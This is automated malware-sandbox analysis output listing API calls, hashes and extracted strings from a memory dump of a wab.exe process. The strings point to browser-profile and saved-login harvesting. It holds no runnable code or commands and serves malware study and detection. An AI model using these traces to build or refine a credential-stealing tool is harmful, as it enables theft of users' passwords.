                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID:
                                                  • API String ID: 829165378-0
                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 004041D6
                                                  • wcscpy.MSVCRT ref: 004041E7
                                                  • memset.MSVCRT ref: 00404200
                                                  • memset.MSVCRT ref: 00404215
                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                  • wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 0040426E
                                                  • memset.MSVCRT ref: 004042CD
                                                  • memset.MSVCRT ref: 004042E2
                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                  • wcscpy.MSVCRT ref: 00404311
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                  • API String ID: 2454223109-1580313836
                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                  • memcpy.MSVCRT ref: 004115C8
                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                  • API String ID: 4054529287-3175352466
                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1607361635-601624466
                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1043902810-0
                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                  • memcpy.MSVCRT ref: 0040E407
                                                  • memcpy.MSVCRT ref: 0040E422
                                                  • memcpy.MSVCRT ref: 0040E43D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  • API String ID: 3073804840-2252543386
                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  • API String ID: 2899246560-1542517562
                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040DBCD
                                                  • memset.MSVCRT ref: 0040DBE9
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  • API String ID: 3330709923-517860148
                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040806A
                                                  • memset.MSVCRT ref: 0040807F
                                                  • _wtoi.MSVCRT ref: 004081AF
                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                  • memset.MSVCRT ref: 004081E4
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                  • String ID: logins$null
                                                  • API String ID: 3492182834-2163367763
                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • memset.MSVCRT ref: 004085CF
                                                  • memset.MSVCRT ref: 004085F1
                                                  • memset.MSVCRT ref: 00408606
                                                  • strcmp.MSVCRT ref: 00408645
                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                  • memset.MSVCRT ref: 0040870E
                                                  • strcmp.MSVCRT ref: 0040876B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                  • String ID: ---
                                                  • API String ID: 3437578500-2854292027
                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0041087D
                                                  • memset.MSVCRT ref: 00410892
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1010922700-0
                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • malloc.MSVCRT ref: 004186B7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                  • malloc.MSVCRT ref: 004186FE
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                  • String ID: |A
                                                  • API String ID: 4233704886-1717621600
                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2081463915-1959339147
                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
